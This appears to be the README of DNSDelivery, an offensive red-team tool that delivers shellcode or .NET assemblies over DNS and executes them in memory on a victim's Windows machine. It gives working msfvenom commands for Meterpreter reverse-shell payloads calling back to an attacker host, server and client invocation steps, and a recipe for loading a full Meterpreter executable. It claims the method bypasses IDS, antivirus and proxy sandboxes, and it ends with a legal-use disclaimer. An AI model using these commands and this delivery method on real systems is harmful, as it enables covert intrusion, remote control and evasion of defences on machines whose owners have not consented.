Author: Arno0x0x - @Arno0x0x
DNSDelivery provides delivery and in memory execution of shellcode or .Net assembly using DNS requests delivery channel.
DNSDelivery has to sides:
- The server side, coming as a single python script (
dnsdelivery.py
), which acts as a custom DNS server, serving the payload data - The client side (victim's side), which comes in two flavors:
-
dnsdelivery.cs
: a C# script that can be compiled withcsc.exe
to provide a Windows managed executable -Invoke-DNSDelivery.ps1
: a PowerShell script providing the exact same functionnalities
In order for the whole thing to work you need to own your domain name and set the DNS record for that domain to point to the server that will run the dnsdelivery.py
server side.
For local testing purposes though, you can configure the client side scripts to point to any DNS server.
The only dependency is on the server side, as the dnsdelivery.py
script relies on the external dnslib library. You can installing it using pip:
pip install dnslib
The only mandatory configurable parameter on the client side is the DNS domain name you want to use (the one you're running the DNS server side on). An optionnal configurable parameter is the DNS server you want to use. By default, it will use the system's default DNS server.
-
For the C# script, you need to edit the script and set the parameters in the PARAM class, comments and variable names are pretty self-explanatory. Then compile it using the built-in C# compiler csc.exe:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:dnsdelivery.exe *.cs
-
For the PowerShell script, you can simply pass the parameters as arguments. Once the module is loaded into powershell simply check the syntax with
Get-Help Invoke-DNSDelivery
SERVER SIDE
Call the `dnsdelivery.py script with the appropriate parameters:
- The
type
of content being delivered: can be eithershellcode
orassembly
- The
filename
which is the name (or path) of the file being delivered
If a shellcode
type is to be delivered, it must be a raw type shellcode obtained, for instance, from metasploit:
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > myShellcodeFile.raw
Example of delivering a shellcode:
root@kali:~# ./dnsdelivery.py shellcode myShellcodeFile.raw
[*] File [myShellcodeFile.raw] successfully loaded
[*] Data split into [5] chunks of 250 bytes
[*] DNS server listening on port 53
[*] Serving [myShellcodeFile.raw] advertised as a [shellcode] data type
Example of delivering a .Net assembly:
root@kali:~# ./dnsdelivery.py assembly peloader.exe
[*] File [peloader.exe] successfully loaded
[*] Data split into [1058] chunks of 250 bytes
[*] DNS server listening on port 53
[*] Serving [peloader.exe] advertised as a [assembly] data type
CLIENT SIDE
If using the C# compiled Windows executable: simply execute it, the parameters are hardcoded within the script.
If using the PowerShell script, well, call it in any of your prefered way (you probably know tons of ways of invoking a powershell script) along with the script parameters. Most basic example:
c:\DNSDelivery> powershell
PS c:\DNSDelivery> Import-Module .\Invoke-DNSDelivery.ps1
PS c:\DNSDelivery> Invoke-DNSDelivery -DomainName mydomain.example.com -Verbose
[...]
I found this delivery method very useful and handy for delivering:
- any meterpreter shellcode
- full-fledged meterpreter executable (standalone meterpreter executable, not staged)
- any .Net assembly you can think of
while completely bypassing perimeter security (IDS, content analysis like AV and sandboxes on proxies, etc.).
Example of delivering a full-fledged meterpreter executable:
First create a non-staged meterpreter executable:
root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f exe-only > meterpreter.exe
Second, encode this executable to a base64 string:
root@kali:~# cat meterpreter.exe | base64 -w 0 > meterpreter.b64
Third paste the base64 string (yes, it can be huge, around 3MB) into the peLoader.cs
(thx @SubTee) available here peloader.cs and compile this into a Windows executable (which by the way IS a .Net assembly).
Eventually, serve it with DNSDelivery:
root@kali:~# ./dnsdelivery.py assembly meterpreter_peloader.exe
It can be long because the data is delivered over DNS, chunk by chunk (250 bytes per chunk), but who cares if it takes 10 minutes and you eventually get you full-fledged meterpreter executable loaded into memory and executed on the victim's machine :-)
This tool is intended to be used in a legal and legitimate way only:
- either on your own systems as a means of learning, of demonstrating what can be done and how, or testing your defense and detection mechanisms
- on systems you've been officially and legitimately entitled to perform some security assessments (pentest, security audits)
Quoting Empire's authors: There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them.